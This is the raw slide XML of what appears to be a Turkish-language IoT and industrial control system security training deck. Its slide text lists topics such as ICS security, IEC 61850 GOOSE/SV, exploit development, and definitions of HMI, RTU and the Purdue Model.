        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451838" y="1518646"/>
            <a:ext cx="4766700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-254000" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IoT Security Temelleri</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353319" y="1053767"/>
            <a:ext cx="1697700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ICS Security</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980431" y="2004035"/>
            <a:ext cx="4766700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IoT Remote Control Apps</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445678" y="2489411"/>
            <a:ext cx="4766700" cy="608100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IoT Security </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="15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PoC Exploit Code </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4111877"/>
            <a:ext cx="372600" cy="372600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="B3C6E7"/>
              </a:gs>
              <a:gs pos="46000">
                <a:srgbClr val="4C78C6"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="254378"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="1F3864"/>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2" name="Google Shape;122;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217417" y="1065426"/>
            <a:ext cx="4766700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IoT Security</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554047" y="2477750"/>
            <a:ext cx="2181900" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit Development</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292814" y="2003172"/>
            <a:ext cx="3818700" cy="263100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit Ortamın Hazırlanması</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6080925" y="1507000"/>
            <a:ext cx="3063000" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IEC 61850 (Goose &amp; SV Protocol)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Google Shape;126;p17" title="IoT&amp;ICS.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426560" y="715672"/>
            <a:ext cx="2127501" cy="2127501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Google Shape;127;p17" title="sol ok.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1007739">
            <a:off x="2874197" y="1686372"/>
            <a:ext cx="1361953" cy="1361953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306072" y="2935825"/>
            <a:ext cx="2181900" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Sonuçları Değerlendir</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Google Shape;129;p17" title="sol ok.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4301400">
            <a:off x="4583323" y="1594122"/>
            <a:ext cx="1361952" cy="1361952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564100" y="4648725"/>
            <a:ext cx="86448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https://e.pcloud.link/publink/show?code=kZ4djtZwwShTuMHLS7VUIPV9yEqQkgbFkw7</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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312" name="Google Shape;312;p44" title="Screenshot 2025-05-30 at 10.26.40.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="413807"/>
            <a:ext cx="9144003" cy="4116587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144175" y="470375"/>
            <a:ext cx="57504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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>HMI (Human-Machine Interface)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, SCADA sistemlerinde operatörlerin makineleri ve süreçleri görsel arayüz üzerinden izleyip kontrol etmesini sağlayan kullanıcı arabirimidir.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281525" y="4008800"/>
            <a:ext cx="47232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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>RTU (Remote Terminal Unit)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, uzak bir konumdan veri toplamak ve kontrol sinyalleri göndermek için kullanılan endüstriyel otomasyon cihazıdır.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;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321" name="Google Shape;321;p45" title="Screenshot 2025-05-30 at 10.25.21.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Google Shape;322;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3869550" y="391225"/>
            <a:ext cx="51792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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Purdue Modeli</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, endüstriyel kontrol sistemleri (ICS) için katmanlı bir ağ mimarisi sunan bir güvenlik standardıdır. Bu model, OT (Operational Technology) ve IT (Information Technology) sistemlerini 0'dan 5'e kadar katmanlara ayırarak güvenlik zonları ve erişim kontrolü sağlar.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;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329" name="Google Shape;329;p46" title="Screenshot 2025-05-30 at 10.24.42.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4"/>
            <a:ext cx="9144003" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925950" y="2019675"/>
            <a:ext cx="88200" cy="128100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="1F232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id="336" name="Google Shape;336;p47" title="Screenshot 2025-05-30 at 10.25.56.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580576" y="325013"/>
            <a:ext cx="6182449" cy="4493475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
